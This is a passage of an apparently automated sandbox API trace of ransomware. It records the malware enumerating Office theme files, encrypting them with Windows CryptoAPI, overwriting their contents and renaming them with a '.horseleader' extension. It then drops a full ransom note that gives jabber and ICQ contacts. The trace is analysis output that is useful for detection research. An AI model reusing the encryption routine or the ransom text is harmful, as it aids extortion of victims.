(HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.556] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PROFILE.ELM.horseleader") returned 91 [0247.556] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PROFILE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\profile.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PROFILE.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\profile.elm.horseleader")) returned 1 [0247.559] GetProcessHeap () returned 0x780000 [0247.559] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.559] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, 
ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d084c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x24b, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PROFILE.INF", cAlternateFileName="")) returned 1 [0247.559] lstrcmpiW (lpString1="PROFILE.INF", lpString2="Windows") returned -1 [0247.559] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PROFILE.INF") returned 79 [0247.559] StrStrIW (lpFirst="PROFILE.INF", lpSrch=".horseleader") returned 0x0 [0247.559] lstrcmpW (lpString1="PROFILE.INF", lpString2="#Decrypt#.txt") returned 1 [0247.559] lstrcmpW (lpString1="PROFILE.INF", lpString2="_uninstalling_.png") returned 1 [0247.559] lstrlenW (lpString=".testttjffg") returned 11 [0247.559] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PROFILE.INF", lpSrch=".testttjffg") returned 0x0 [0247.559] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.559] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.559] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PROFILE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\profile.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.560] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PROFILE.INF") returned 79 [0247.560] StrStrW 
(lpFirst="PROFILE.INF", lpSrch=".txt") returned 0x0 [0247.560] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=587) returned 1 [0247.560] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x24b, lpOverlapped=0x0) returned 1 [0247.561] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffdb5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.562] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x24b, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x24b, lpOverlapped=0x0) returned 1 [0247.562] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.562] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.562] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.562] CloseHandle (hObject=0x1a4) returned 1 [0247.562] GetProcessHeap () returned 0x780000 [0247.562] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.563] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PROFILE.INF.horseleader") returned 91 [0247.563] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PROFILE.INF" (normalized: "c:\\program files\\common files\\microsoft 
shared\\themes14\\profile\\profile.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PROFILE.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\profile.inf.horseleader")) returned 1 [0247.564] GetProcessHeap () returned 0x780000 [0247.564] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.564] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x4162, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0247.564] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0247.565] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 80 [0247.565] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0247.565] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0247.565] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0247.565] lstrlenW (lpString=".testttjffg") returned 11 [0247.565] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0247.565] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.565] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, 
pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.565] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.566] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 80 [0247.566] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0247.566] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=16738) returned 1 [0247.566] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x4162, lpOverlapped=0x0) returned 1 [0247.571] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffbe9e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.572] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x4162, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x4162, lpOverlapped=0x0) returned 1 [0247.572] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.572] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.572] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 
[0247.572] CloseHandle (hObject=0x1a4) returned 1 [0247.572] GetProcessHeap () returned 0x780000 [0247.572] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.572] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG.horseleader") returned 92 [0247.572] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\thmbnail.png.horseleader")) returned 1 [0247.573] GetProcessHeap () returned 0x780000 [0247.573] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.574] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x4162, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0247.574] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0247.574] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\#Decrypt#.txt") returned 81 [0247.574] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\#Decrypt#.txt" (normalized: "c:\\program files\\common 
files\\microsoft shared\\themes14\\profile\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0247.574] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0247.574] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0247.576] lstrlenA (lpString="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") returned 1368 [0247.576] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0247.576] CloseHandle (hObject=0x158) returned 1 [0247.576] GetProcessHeap () returned 0x780000 [0247.576] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0247.576] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="QUAD", cAlternateFileName="")) returned 1 [0247.576] lstrcmpiW (lpString1="QUAD", lpString2="Windows") returned -1 [0247.576] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD") returned 64 [0247.576] lstrcmpW (lpString1="QUAD", lpString2=".") returned 1 [0247.576] lstrcmpW (lpString1="QUAD", lpString2="..") returned 1 [0247.576] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0247.576] GetProcessHeap () returned 0x780000 [0247.576] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, 
Size=0x840) returned 0x7dbfd8 [0247.577] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\*") returned 66 [0247.577] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0247.577] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0247.577] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\.") returned 66 [0247.577] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0247.577] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0247.577] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0247.577] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\..") returned 67 [0247.577] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0247.577] lstrcmpW (lpString1="..", 
lpString2="..") returned 0 [0247.577] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a71ef90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x59f, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0247.577] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0247.577] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 76 [0247.577] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0247.578] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0247.578] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0247.578] lstrlenW (lpString=".testttjffg") returned 11 [0247.578] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0247.578] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.578] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.578] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.579] 
lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 76 [0247.579] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0247.579] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1439) returned 1 [0247.579] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x59f, lpOverlapped=0x0) returned 1 [0247.581] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffa61, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.581] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x59f, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x59f, lpOverlapped=0x0) returned 1 [0247.582] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.582] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.582] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.582] CloseHandle (hObject=0x1a4) returned 1 [0247.582] GetProcessHeap () returned 0x780000 [0247.582] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.582] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF.horseleader") returned 88 [0247.582] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\preview.gif.horseleader")) returned 1 [0247.583] GetProcessHeap () returned 0x780000 [0247.583] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.583] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b366a00, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x5a8037d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1b366a00, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0xbba7, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="QUAD.ELM", cAlternateFileName="")) returned 1 [0247.583] lstrcmpiW (lpString1="QUAD.ELM", lpString2="Windows") returned -1 [0247.583] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\QUAD.ELM") returned 73 [0247.583] StrStrIW (lpFirst="QUAD.ELM", lpSrch=".horseleader") returned 0x0 [0247.583] lstrcmpW (lpString1="QUAD.ELM", lpString2="#Decrypt#.txt") returned 1 [0247.583] lstrcmpW (lpString1="QUAD.ELM", lpString2="_uninstalling_.png") returned 1 [0247.583] lstrlenW (lpString=".testttjffg") returned 11 [0247.583] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\QUAD.ELM", lpSrch=".testttjffg") returned 0x0 [0247.583] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.584] CryptEncrypt (in: hKey=0x7c65a0, 
hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.584] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\QUAD.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\quad.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.585] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\QUAD.ELM") returned 73 [0247.585] StrStrW (lpFirst="QUAD.ELM", lpSrch=".txt") returned 0x0 [0247.585] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=48039) returned 1 [0247.585] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.590] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.591] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.591] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.591] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.592] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, 
